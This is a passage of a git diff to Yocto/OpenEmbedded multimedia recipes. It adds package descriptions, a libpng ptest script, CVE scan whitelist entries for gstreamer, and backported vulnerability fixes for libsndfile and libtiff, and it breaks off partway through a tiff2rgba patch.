diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb
index 7afe56cd7b..14793b7fdf 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb
@@ -22,6 +22,7 @@ SRC_URI = " \
22 file://0003-meson-Add-valgrind-feature.patch \ 22 file://0003-meson-Add-valgrind-feature.patch \
23 file://0004-meson-Add-option-for-installed-tests.patch \ 23 file://0004-meson-Add-option-for-installed-tests.patch \
24 file://0005-bufferpool-only-resize-in-reset-when-maxsize-is-larger.patch \ 24 file://0005-bufferpool-only-resize-in-reset-when-maxsize-is-larger.patch \
25 file://0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch \
25" 26"
26SRC_URI[md5sum] = "beecf6965a17fb17fa3b262fd36df70a" 27SRC_URI[md5sum] = "beecf6965a17fb17fa3b262fd36df70a"
27SRC_URI[sha256sum] = "692f037968e454e508b0f71d9674e2e26c78475021407fcf8193b1c7e59543c7" 28SRC_URI[sha256sum] = "692f037968e454e508b0f71d9674e2e26c78475021407fcf8193b1c7e59543c7"
@@ -40,7 +41,7 @@ PACKAGECONFIG[unwind] = "-Dlibunwind=enabled,-Dlibunwind=disabled,libunwind"
40PACKAGECONFIG[dw] = "-Dlibdw=enabled,-Dlibdw=disabled,elfutils" 41PACKAGECONFIG[dw] = "-Dlibdw=enabled,-Dlibdw=disabled,elfutils"
41PACKAGECONFIG[bash-completion] = "-Dbash-completion=enabled,-Dbash-completion=disabled,bash-completion" 42PACKAGECONFIG[bash-completion] = "-Dbash-completion=enabled,-Dbash-completion=disabled,bash-completion"
42PACKAGECONFIG[tools] = "-Dtools=enabled,-Dtools=disabled" 43PACKAGECONFIG[tools] = "-Dtools=enabled,-Dtools=disabled"
43PACKAGECONFIG[setcap] = ",,libcap libcap-native" 44PACKAGECONFIG[setcap] = "-Dptp-helper-permissions=capabilities,,libcap libcap-native"
44 45
45# TODO: put this in a gettext.bbclass patch 46# TODO: put this in a gettext.bbclass patch
46def gettext_oemeson(d): 47def gettext_oemeson(d):
@@ -74,4 +75,20 @@ FILES_${PN}-dbg += "${datadir}/gdb ${datadir}/gstreamer-1.0/gdb"
74 75
75CVE_PRODUCT = "gstreamer" 76CVE_PRODUCT = "gstreamer"
76 77
78# CPE entries for gst-plugins-base are listed as gstreamer issues
79# so we need to ignore the false hits
80CVE_CHECK_WHITELIST += "CVE-2021-3522"
81
82# CPE entries for gst-plugins-good are listed as gstreamer issues
83# so we need to ignore the false hits
84CVE_CHECK_WHITELIST += "CVE-2021-3497"
85CVE_CHECK_WHITELIST += "CVE-2021-3498"
86CVE_CHECK_WHITELIST += "CVE-2022-1920"
87CVE_CHECK_WHITELIST += "CVE-2022-1921"
88CVE_CHECK_WHITELIST += "CVE-2022-1922"
89CVE_CHECK_WHITELIST += "CVE-2022-1923"
90CVE_CHECK_WHITELIST += "CVE-2022-1924"
91CVE_CHECK_WHITELIST += "CVE-2022-1925"
92CVE_CHECK_WHITELIST += "CVE-2022-2122"
93
77require gstreamer1.0-ptest.inc 94require gstreamer1.0-ptest.inc
diff --git a/meta/recipes-multimedia/lame/lame_3.100.bb b/meta/recipes-multimedia/lame/lame_3.100.bb
index 7f8996fb52..d007e0a495 100644
--- a/meta/recipes-multimedia/lame/lame_3.100.bb
+++ b/meta/recipes-multimedia/lame/lame_3.100.bb
@@ -1,5 +1,6 @@
1SUMMARY = "High quality MP3 audio encoder" 1SUMMARY = "High quality MP3 audio encoder"
2HOMEPAGE = "http://lame.sourceforge.net/" 2DESCRIPTION = "LAME is an educational tool to be used for learning about MP3 encoding."
3HOMEPAGE = "https://lame.sourceforge.io/"
3BUGTRACKER = "http://sourceforge.net/tracker/?group_id=290&atid=100290" 4BUGTRACKER = "http://sourceforge.net/tracker/?group_id=290&atid=100290"
4SECTION = "console/utils" 5SECTION = "console/utils"
5LICENSE = "LGPLv2+" 6LICENSE = "LGPLv2+"
diff --git a/meta/recipes-multimedia/liba52/liba52_0.7.4.bb b/meta/recipes-multimedia/liba52/liba52_0.7.4.bb
index 8ff8889b60..0ef5d947c3 100644
--- a/meta/recipes-multimedia/liba52/liba52_0.7.4.bb
+++ b/meta/recipes-multimedia/liba52/liba52_0.7.4.bb
@@ -1,4 +1,7 @@
1SUMMARY = "ATSC A/52 surround sound stream decoder" 1SUMMARY = "ATSC A/52 surround sound stream decoder"
2DESCRIPTION = "Library for decoding ATSC A/52 streams. The A/52 standard \
3is used in a variety of applications, including digital television \
4and DVD. It is also known as AC-3."
2HOMEPAGE = "http://liba52.sourceforge.net/" 5HOMEPAGE = "http://liba52.sourceforge.net/"
3LICENSE = "GPLv2+" 6LICENSE = "GPLv2+"
4LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \ 7LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \
diff --git a/meta/recipes-multimedia/libid3tag/libid3tag/cflags_filter.patch b/meta/recipes-multimedia/libid3tag/libid3tag/cflags_filter.patch
new file mode 100644
index 0000000000..0d1d0dc381
--- /dev/null
+++ b/meta/recipes-multimedia/libid3tag/libid3tag/cflags_filter.patch
@@ -0,0 +1,21 @@
1configure contains CFLAGS filtering code which was removing our prefix-map
2flags. We need those to generate reproducible binaries. Allow them through.
3
4Upstream-Status: Pending
5Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
6
7Index: libid3tag-0.15.1b/configure.ac
8===================================================================
9--- libid3tag-0.15.1b.orig/configure.ac
10+++ libid3tag-0.15.1b/configure.ac
11@@ -99,6 +99,10 @@ do
12 -mno-cygwin)
13 shift
14 ;;
15+ -fmacro-prefix-map*|-fdebug-prefix-map*)
16+ CFLAGS="$CFLAGS $1"
17+ shift
18+ ;;
19 -m*)
20 arch="$arch $1"
21 shift
diff --git a/meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb b/meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb
index 0312a610c0..80581765ac 100644
--- a/meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb
+++ b/meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb
@@ -15,6 +15,7 @@ SRC_URI = "${SOURCEFORGE_MIRROR}/mad/libid3tag-${PV}.tar.gz \
15 file://0001-Fix-gperf-3.1-incompatibility.patch \ 15 file://0001-Fix-gperf-3.1-incompatibility.patch \
16 file://10_utf16.patch \ 16 file://10_utf16.patch \
17 file://unknown-encoding.patch \ 17 file://unknown-encoding.patch \
18 file://cflags_filter.patch \
18 " 19 "
19UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/mad/files/libid3tag/" 20UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/mad/files/libid3tag/"
20UPSTREAM_CHECK_REGEX = "/projects/mad/files/libid3tag/(?P<pver>.*)/$" 21UPSTREAM_CHECK_REGEX = "/projects/mad/files/libid3tag/(?P<pver>.*)/$"
diff --git a/meta/recipes-multimedia/libpng/files/run-ptest b/meta/recipes-multimedia/libpng/files/run-ptest
new file mode 100644
index 0000000000..9ab5d0c1f4
--- /dev/null
+++ b/meta/recipes-multimedia/libpng/files/run-ptest
@@ -0,0 +1,29 @@
1#!/bin/sh
2
3set -eux
4
5./pngfix pngtest.png &> log.txt 2>&1
6
7if grep -i "OK" log.txt 2>&1 ; then
8 echo "PASS: pngfix passed"
9else
10 echo "FAIL: pngfix failed"
11fi
12rm -f log.txt
13
14./pngtest pngtest.png &> log.txt 2>&1
15
16if grep -i "PASS" log.txt 2>&1 ; then
17 echo "PASS: pngtest passed"
18else
19 echo "FAIL: pngtest failed"
20fi
21rm -f log.txt
22
23for i in pngstest timepng; do
24 if "./${i}" pngtest.png 2>&1; then
25 echo "PASS: $i"
26 else
27 echo "FAIL: $i"
28 fi
29done
diff --git a/meta/recipes-multimedia/libpng/libpng_1.6.37.bb b/meta/recipes-multimedia/libpng/libpng_1.6.37.bb
index 8c53d11642..9387fc8e2e 100644
--- a/meta/recipes-multimedia/libpng/libpng_1.6.37.bb
+++ b/meta/recipes-multimedia/libpng/libpng_1.6.37.bb
@@ -1,4 +1,7 @@
1SUMMARY = "PNG image format decoding library" 1SUMMARY = "PNG image format decoding library"
2DESCRIPTION = "An open source project to develop and maintain the reference \
3library for use in applications that read, create, and manipulate PNG \
4(Portable Network Graphics) raster image files. "
2HOMEPAGE = "http://www.libpng.org/" 5HOMEPAGE = "http://www.libpng.org/"
3SECTION = "libs" 6SECTION = "libs"
4LICENSE = "Libpng" 7LICENSE = "Libpng"
@@ -7,7 +10,10 @@ DEPENDS = "zlib"
7 10
8LIBV = "16" 11LIBV = "16"
9 12
10SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BPN}${LIBV}/${BP}.tar.xz" 13SRC_URI = "\
14 ${SOURCEFORGE_MIRROR}/${BPN}/${BPN}${LIBV}/${BP}.tar.xz \
15 file://run-ptest \
16 "
11SRC_URI[md5sum] = "015e8e15db1eecde5f2eb9eb5b6e59e9" 17SRC_URI[md5sum] = "015e8e15db1eecde5f2eb9eb5b6e59e9"
12SRC_URI[sha256sum] = "505e70834d35383537b6491e7ae8641f1a4bed1876dbfe361201fc80868d88ca" 18SRC_URI[sha256sum] = "505e70834d35383537b6491e7ae8641f1a4bed1876dbfe361201fc80868d88ca"
13 19
@@ -17,7 +23,7 @@ UPSTREAM_CHECK_URI = "http://libpng.org/pub/png/libpng.html"
17 23
18BINCONFIG = "${bindir}/libpng-config ${bindir}/libpng16-config" 24BINCONFIG = "${bindir}/libpng-config ${bindir}/libpng16-config"
19 25
20inherit autotools binconfig-disabled pkgconfig 26inherit autotools binconfig-disabled pkgconfig ptest
21 27
22# Work around missing symbols 28# Work around missing symbols
23EXTRA_OECONF_append_class-target = " ${@bb.utils.contains("TUNE_FEATURES", "neon", "--enable-arm-neon=on", "--enable-arm-neon=off" ,d)}" 29EXTRA_OECONF_append_class-target = " ${@bb.utils.contains("TUNE_FEATURES", "neon", "--enable-arm-neon=on", "--enable-arm-neon=off" ,d)}"
@@ -30,3 +36,11 @@ BBCLASSEXTEND = "native nativesdk"
30 36
31# CVE-2019-17371 is actually a memory leak in gif2png 2.x 37# CVE-2019-17371 is actually a memory leak in gif2png 2.x
32CVE_CHECK_WHITELIST += "CVE-2019-17371" 38CVE_CHECK_WHITELIST += "CVE-2019-17371"
39
40do_install_ptest() {
41 install -m644 "${S}/pngtest.png" "${D}${PTEST_PATH}"
42 install -m755 "${B}/.libs/pngfix" "${D}${PTEST_PATH}"
43 install -m755 "${B}/.libs/pngtest" "${D}${PTEST_PATH}"
44 install -m755 "${B}/.libs/pngstest" "${D}${PTEST_PATH}"
45 install -m755 "${B}/.libs/timepng" "${D}${PTEST_PATH}"
46}
diff --git a/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch b/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch
new file mode 100644
index 0000000000..b42d564b4b
--- /dev/null
+++ b/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch
@@ -0,0 +1,13 @@
1Index: libsamplerate-0.1.8/configure.ac
2===================================================================
3--- libsamplerate-0.1.8.orig/configure.ac
4+++ libsamplerate-0.1.8/configure.ac
5@@ -53,7 +53,7 @@ AC_PROG_LN_S
6 # 6. If any interfaces have been removed since the last public release, then set age
7 # to 0.
8
9-SHARED_VERSION_INFO="1:8:1"
10+SHARED_VERSION_INFO="1:9:1"
11
12
13
diff --git a/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb b/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb
index ae08189441..8345d6880f 100644
--- a/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb
+++ b/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Audio Sample Rate Conversion library" 1SUMMARY = "Audio Sample Rate Conversion library"
2DESCRIPTION = "Also known as Secret Rabbit Code - a library for performing sample rate conversion of audio data."
2HOMEPAGE = "http://www.mega-nerd.com/SRC/" 3HOMEPAGE = "http://www.mega-nerd.com/SRC/"
3SECTION = "libs" 4SECTION = "libs"
4LICENSE = "BSD-2-Clause" 5LICENSE = "BSD-2-Clause"
@@ -9,6 +10,7 @@ PR = "r1"
9 10
10SRC_URI = "http://www.mega-nerd.com/SRC/libsamplerate-${PV}.tar.gz \ 11SRC_URI = "http://www.mega-nerd.com/SRC/libsamplerate-${PV}.tar.gz \
11 file://0001-configure.ac-improve-alsa-handling.patch \ 12 file://0001-configure.ac-improve-alsa-handling.patch \
13 file://shared_version_info.patch \
12" 14"
13 15
14SRC_URI[md5sum] = "2b78ae9fe63b36b9fbb6267fad93f259" 16SRC_URI[md5sum] = "2b78ae9fe63b36b9fbb6267fad93f259"
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch
new file mode 100644
index 0000000000..6354f856cb
--- /dev/null
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch
@@ -0,0 +1,36 @@
1From a9815b3f228df00086e0a40bcc43162fc19896a1 Mon Sep 17 00:00:00 2001
2From: bobsayshilol <bobsayshilol@live.co.uk>
3Date: Wed, 17 Feb 2021 23:21:48 +0000
4Subject: [PATCH 1/2] wavlike: Fix incorrect size check
5
6The SF_CART_INFO_16K struct has an additional 4 byte field to hold
7the size of 'tag_text' which the file header doesn't, so don't
8include it as part of the check when looking for the max length.
9
10https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=26026
11
12Upstream-Status: Backport
13CVE: CVE-2021-3246 patch 1
14Signed-off-by: Armin Kuster <akuster@mvista.com>
15
16---
17 src/wavlike.c | 6 +++++-
18 1 file changed, 5 insertions(+), 1 deletion(-)
19
20Index: libsndfile-1.0.28/src/wavlike.c
21===================================================================
22--- libsndfile-1.0.28.orig/src/wavlike.c
23+++ libsndfile-1.0.28/src/wavlike.c
24@@ -803,7 +803,11 @@ wavlike_read_cart_chunk (SF_PRIVATE *psf
25 return 0 ;
26 } ;
27
28- if (chunksize >= sizeof (SF_CART_INFO_16K))
29+ /*
30+ ** SF_CART_INFO_16K has an extra field 'tag_text_size' that isn't part
31+ ** of the chunk, so don't include it in the size check.
32+ */
33+ if (chunksize >= sizeof (SF_CART_INFO_16K) - 4)
34 { psf_log_printf (psf, "cart : %u too big to be handled\n", chunksize) ;
35 psf_binheader_readf (psf, "j", chunksize) ;
36 return 0 ;
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch
new file mode 100644
index 0000000000..d6b03d7d4d
--- /dev/null
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch
@@ -0,0 +1,44 @@
1From deb669ee8be55a94565f6f8a6b60890c2e7c6f32 Mon Sep 17 00:00:00 2001
2From: bobsayshilol <bobsayshilol@live.co.uk>
3Date: Thu, 18 Feb 2021 21:52:09 +0000
4Subject: [PATCH 2/2] ms_adpcm: Fix and extend size checks
5
6'blockalign' is the size of a block, and each block contains 7 samples
7per channel as part of the preamble, so check against 'samplesperblock'
8rather than 'blockalign'. Also add an additional check that the block
9is big enough to hold the samples it claims to hold.
10
11https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=26803
12
13Upstream-Status: Backport
14CVE: CVE-2021-3246 patch 2
15Signed-off-by: Armin Kuster <akuster@mvista.com>
16
17---
18 src/ms_adpcm.c | 10 ++++++++--
19 1 file changed, 8 insertions(+), 2 deletions(-)
20
21diff --git a/src/ms_adpcm.c b/src/ms_adpcm.c
22index 5e8f1a31..a21cb994 100644
23--- a/src/ms_adpcm.c
24+++ b/src/ms_adpcm.c
25@@ -128,8 +128,14 @@ wavlike_msadpcm_init (SF_PRIVATE *psf, int blockalign, int samplesperblock)
26 if (psf->file.mode == SFM_WRITE)
27 samplesperblock = 2 + 2 * (blockalign - 7 * psf->sf.channels) / psf->sf.channels ;
28
29- if (blockalign < 7 * psf->sf.channels)
30- { psf_log_printf (psf, "*** Error blockalign (%d) should be > %d.\n", blockalign, 7 * psf->sf.channels) ;
31+ /* There's 7 samples per channel in the preamble of each block */
32+ if (samplesperblock < 7 * psf->sf.channels)
33+ { psf_log_printf (psf, "*** Error samplesperblock (%d) should be >= %d.\n", samplesperblock, 7 * psf->sf.channels) ;
34+ return SFE_INTERNAL ;
35+ } ;
36+
37+ if (2 * blockalign < samplesperblock * psf->sf.channels)
38+ { psf_log_printf (psf, "*** Error blockalign (%d) should be >= %d.\n", blockalign, samplesperblock * psf->sf.channels / 2) ;
39 return SFE_INTERNAL ;
40 } ;
41
42--
432.25.1
44
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-4156.patch b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-4156.patch
new file mode 100644
index 0000000000..f7ae82588f
--- /dev/null
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-4156.patch
@@ -0,0 +1,30 @@
1From ced91d7b971be6173b604154c39279ce90ad87cc Mon Sep 17 00:00:00 2001
2From: yuan <ssspeed00@gmail.com>
3Date: Tue, 20 Apr 2021 16:16:32 +0800
4Subject: [PATCH] flac: Fix improper buffer reusing (#732)
5
6Upstream-Status: Backport [https://github.com/libsndfile/libsndfile/commit/ced91d7b971be6173b604154c39279ce90ad87cc]
7CVE: CVE-2021-4156
8Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
9---
10 src/flac.c | 4 ++++
11 1 file changed, 4 insertions(+)
12
13diff --git a/src/flac.c b/src/flac.c
14index 0be82ac..4fa5cfa 100644
15--- a/src/flac.c
16+++ b/src/flac.c
17@@ -952,7 +952,11 @@ flac_read_loop (SF_PRIVATE *psf, unsigned len)
18 /* Decode some more. */
19 while (pflac->pos < pflac->len)
20 { if (FLAC__stream_decoder_process_single (pflac->fsd) == 0)
21+ { psf_log_printf (psf, "FLAC__stream_decoder_process_single returned false\n") ;
22+ /* Current frame is busted, so NULL the pointer. */
23+ pflac->frame = NULL ;
24 break ;
25+ } ;
26 state = FLAC__stream_decoder_get_state (pflac->fsd) ;
27 if (state >= FLAC__STREAM_DECODER_END_OF_STREAM)
28 { psf_log_printf (psf, "FLAC__stream_decoder_get_state returned %s\n", FLAC__StreamDecoderStateString [state]) ;
29--
302.40.1
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2022-33065.patch b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2022-33065.patch
new file mode 100644
index 0000000000..e22b4e9389
--- /dev/null
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2022-33065.patch
@@ -0,0 +1,46 @@
1From 0754562e13d2e63a248a1c82f90b30bc0ffe307c Mon Sep 17 00:00:00 2001
2From: Alex Stewart <alex.stewart@ni.com>
3Date: Tue, 10 Oct 2023 16:10:34 -0400
4Subject: [PATCH] mat4/mat5: fix int overflow in dataend calculation
5
6The clang sanitizer warns of a possible signed integer overflow when
7calculating the `dataend` value in `mat4_read_header()`.
8
9```
10src/mat4.c:323:41: runtime error: signed integer overflow: 205 * -100663296 cannot be represented in type 'int'
11SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/mat4.c:323:41 in
12src/mat4.c:323:48: runtime error: signed integer overflow: 838860800 * 4 cannot be represented in type 'int'
13SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/mat4.c:323:48 in
14```
15
16Cast the offending `rows` and `cols` ints to `sf_count_t` (the type of
17`dataend` before performing the calculation, to avoid the issue.
18
19CVE: CVE-2022-33065
20Fixes: https://github.com/libsndfile/libsndfile/issues/789
21Fixes: https://github.com/libsndfile/libsndfile/issues/833
22
23Signed-off-by: Alex Stewart <alex.stewart@ni.com>
24
25Upstream-Status: Backport [https://github.com/libsndfile/libsndfile/commit/0754562e13d2e63a248a1c82f90b30bc0ffe307c]
26CVE: CVE-2022-33065
27Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
28---
29 src/mat4.c | 2 +-
30 1 file changed, 1 insertion(+), 1 deletion(-)
31
32diff --git a/src/mat4.c b/src/mat4.c
33index 3c73680..e2f98b7 100644
34--- a/src/mat4.c
35+++ b/src/mat4.c
36@@ -320,7 +320,7 @@ mat4_read_header (SF_PRIVATE *psf)
37 psf->filelength - psf->dataoffset, psf->sf.channels * psf->sf.frames * psf->bytewidth) ;
38 }
39 else if ((psf->filelength - psf->dataoffset) > psf->sf.channels * psf->sf.frames * psf->bytewidth)
40- psf->dataend = psf->dataoffset + rows * cols * psf->bytewidth ;
41+ psf->dataend = psf->dataoffset + (sf_count_t) rows * (sf_count_t) cols * psf->bytewidth ;
42
43 psf->datalength = psf->filelength - psf->dataoffset - psf->dataend ;
44
45--
462.40.1
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb b/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb
index b100108766..fb7d94ab75 100644
--- a/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb
@@ -1,4 +1,7 @@
1SUMMARY = "Audio format Conversion library" 1SUMMARY = "Audio format Conversion library"
2DESCRIPTION = "Library for reading and writing files containing sampled \
3sound (such as MS Windows WAV and the Apple/SGI AIFF format) through \
4one standard library interface."
2HOMEPAGE = "http://www.mega-nerd.com/libsndfile" 5HOMEPAGE = "http://www.mega-nerd.com/libsndfile"
3AUTHOR = "Erik de Castro Lopo" 6AUTHOR = "Erik de Castro Lopo"
4DEPENDS = "flac libogg libvorbis" 7DEPENDS = "flac libogg libvorbis"
@@ -17,7 +20,11 @@ SRC_URI = "http://www.mega-nerd.com/libsndfile/files/libsndfile-${PV}.tar.gz \
17 file://CVE-2017-12562.patch \ 20 file://CVE-2017-12562.patch \
18 file://CVE-2018-19758.patch \ 21 file://CVE-2018-19758.patch \
19 file://CVE-2019-3832.patch \ 22 file://CVE-2019-3832.patch \
20 " 23 file://CVE-2021-3246_1.patch \
24 file://CVE-2021-3246_2.patch \
25 file://CVE-2022-33065.patch \
26 file://CVE-2021-4156.patch \
27 "
21 28
22SRC_URI[md5sum] = "646b5f98ce89ac60cdb060fcd398247c" 29SRC_URI[md5sum] = "646b5f98ce89ac60cdb060fcd398247c"
23SRC_URI[sha256sum] = "1ff33929f042fa333aed1e8923aa628c3ee9e1eb85512686c55092d1e5a9dfa9" 30SRC_URI[sha256sum] = "1ff33929f042fa333aed1e8923aa628c3ee9e1eb85512686c55092d1e5a9dfa9"
diff --git a/meta/recipes-multimedia/libtiff/files/0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch b/meta/recipes-multimedia/libtiff/files/0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch
new file mode 100644
index 0000000000..31f867e000
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch
@@ -0,0 +1,52 @@
1From b12a0326e6064b6e0b051d1184a219877472f69b Mon Sep 17 00:00:00 2001
2From: 4ugustus <wangdw.augustus@qq.com>
3Date: Tue, 25 Jan 2022 16:25:28 +0000
4Subject: [PATCH] tiffset: fix global-buffer-overflow for ASCII tags where
5 count is required (fixes #355)
6
7CVE: CVE-2022-22844
8Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/03047a26952a82daaa0792957ce211e0aa51bc64]
9Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com>
10Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com>
11Comments: Add header stdint.h in tiffset.c explicitly for UINT16_MAX
12---
13 tools/tiffset.c | 17 ++++++++++++++---
14 1 file changed, 14 insertions(+), 3 deletions(-)
15
16diff --git a/tools/tiffset.c b/tools/tiffset.c
17index 8c9e23c5..e7a88c09 100644
18--- a/tools/tiffset.c
19+++ b/tools/tiffset.c
20@@ -33,6 +33,7 @@
21 #include <string.h>
22 #include <stdlib.h>
23
24+#include <stdint.h>
25 #include "tiffio.h"
26
27 static char* usageMsg[] = {
28@@ -146,9 +146,19 @@ main(int argc, char* argv[])
29
30 arg_index++;
31 if (TIFFFieldDataType(fip) == TIFF_ASCII) {
32- if (TIFFSetField(tiff, TIFFFieldTag(fip), argv[arg_index]) != 1)
33- fprintf( stderr, "Failed to set %s=%s\n",
34- TIFFFieldName(fip), argv[arg_index] );
35+ if(TIFFFieldPassCount( fip )) {
36+ size_t len;
37+ len = strlen(argv[arg_index]) + 1;
38+ if (len > UINT16_MAX || TIFFSetField(tiff, TIFFFieldTag(fip),
39+ (uint16_t)len, argv[arg_index]) != 1)
40+ fprintf( stderr, "Failed to set %s=%s\n",
41+ TIFFFieldName(fip), argv[arg_index] );
42+ } else {
43+ if (TIFFSetField(tiff, TIFFFieldTag(fip),
44+ argv[arg_index]) != 1)
45+ fprintf( stderr, "Failed to set %s=%s\n",
46+ TIFFFieldName(fip), argv[arg_index] );
47+ }
48 } else if (TIFFFieldWriteCount(fip) > 0
49 || TIFFFieldWriteCount(fip) == TIFF_VARIABLE) {
50 int ret = 1;
51--
52GitLab
diff --git a/meta/recipes-multimedia/libtiff/files/001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch b/meta/recipes-multimedia/libtiff/files/001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch
new file mode 100644
index 0000000000..9b4724a325
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch
@@ -0,0 +1,148 @@
1From 02875964eba5c4a2ea98c41562835428214adfe7 Mon Sep 17 00:00:00 2001
2From: Thomas Bernard <miniupnp@free.fr>
3Date: Sat, 7 Mar 2020 13:21:56 +0100
4Subject: [PATCH] tiff2rgba: output usage to stdout when using -h
5
6also uses std C EXIT_FAILURE / EXIT_SUCCESS
7see #17
8
9Signed-off-by: akash hadke <akash.hadke@kpit.com>
10---
11 tools/tiff2rgba.c | 39 ++++++++++++++++++++++++---------------
12 1 file changed, 24 insertions(+), 15 deletions(-)
13---
14Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/02875964eba5c4a2ea98c41562835428214adfe7.patch]
15---
16diff --git a/tools/tiff2rgba.c b/tools/tiff2rgba.c
17index 2eb6f6c4..ef643653 100644
18--- a/tools/tiff2rgba.c
19+++ b/tools/tiff2rgba.c
20@@ -39,6 +39,13 @@
21 #include "tiffiop.h"
22 #include "tiffio.h"
23
24+#ifndef EXIT_SUCCESS
25+#define EXIT_SUCCESS 0
26+#endif
27+#ifndef EXIT_FAILURE
28+#define EXIT_FAILURE 1
29+#endif
30+
31 #define streq(a,b) (strcmp(a,b) == 0)
32 #define CopyField(tag, v) \
33 if (TIFFGetField(in, tag, &v)) TIFFSetField(out, tag, v)
34@@ -68,7 +75,7 @@ main(int argc, char* argv[])
35 extern char *optarg;
36 #endif
37
38- while ((c = getopt(argc, argv, "c:r:t:bn8")) != -1)
39+ while ((c = getopt(argc, argv, "c:r:t:bn8h")) != -1)
40 switch (c) {
41 case 'b':
42 process_by_block = 1;
43@@ -86,7 +93,7 @@ main(int argc, char* argv[])
44 else if (streq(optarg, "zip"))
45 compression = COMPRESSION_DEFLATE;
46 else
47- usage(-1);
48+ usage(EXIT_FAILURE);
49 break;
50
51 case 'r':
52@@ -105,17 +112,20 @@ main(int argc, char* argv[])
53 bigtiff_output = 1;
54 break;
55
56+ case 'h':
57+ usage(EXIT_SUCCESS);
58+ /*NOTREACHED*/
59 case '?':
60- usage(0);
61+ usage(EXIT_FAILURE);
62 /*NOTREACHED*/
63 }
64
65 if (argc - optind < 2)
66- usage(-1);
67+ usage(EXIT_FAILURE);
68
69 out = TIFFOpen(argv[argc-1], bigtiff_output?"w8":"w");
70 if (out == NULL)
71- return (-2);
72+ return (EXIT_FAILURE);
73
74 for (; optind < argc-1; optind++) {
75 in = TIFFOpen(argv[optind], "r");
76@@ -132,7 +142,7 @@ main(int argc, char* argv[])
77 }
78 }
79 (void) TIFFClose(out);
80- return (0);
81+ return (EXIT_SUCCESS);
82 }
83
84 static int
85@@ -166,7 +176,7 @@ cvt_by_tile( TIFF *in, TIFF *out )
86 if (tile_width != (rastersize / tile_height) / sizeof( uint32))
87 {
88 TIFFError(TIFFFileName(in), "Integer overflow when calculating raster buffer");
89- exit(-1);
90+ exit(EXIT_FAILURE);
91 }
92 raster = (uint32*)_TIFFmalloc(rastersize);
93 if (raster == 0) {
94@@ -182,7 +192,7 @@ cvt_by_tile( TIFF *in, TIFF *out )
95 if (tile_width != wrk_linesize / sizeof (uint32))
96 {
97 TIFFError(TIFFFileName(in), "Integer overflow when calculating wrk_line buffer");
98- exit(-1);
99+ exit(EXIT_FAILURE);
100 }
101 wrk_line = (uint32*)_TIFFmalloc(wrk_linesize);
102 if (!wrk_line) {
103@@ -279,7 +289,7 @@ cvt_by_strip( TIFF *in, TIFF *out )
104 if (width != (rastersize / rowsperstrip) / sizeof( uint32))
105 {
106 TIFFError(TIFFFileName(in), "Integer overflow when calculating raster buffer");
107- exit(-1);
108+ exit(EXIT_FAILURE);
109 }
110 raster = (uint32*)_TIFFmalloc(rastersize);
111 if (raster == 0) {
112@@ -295,7 +305,7 @@ cvt_by_strip( TIFF *in, TIFF *out )
113 if (width != wrk_linesize / sizeof (uint32))
114 {
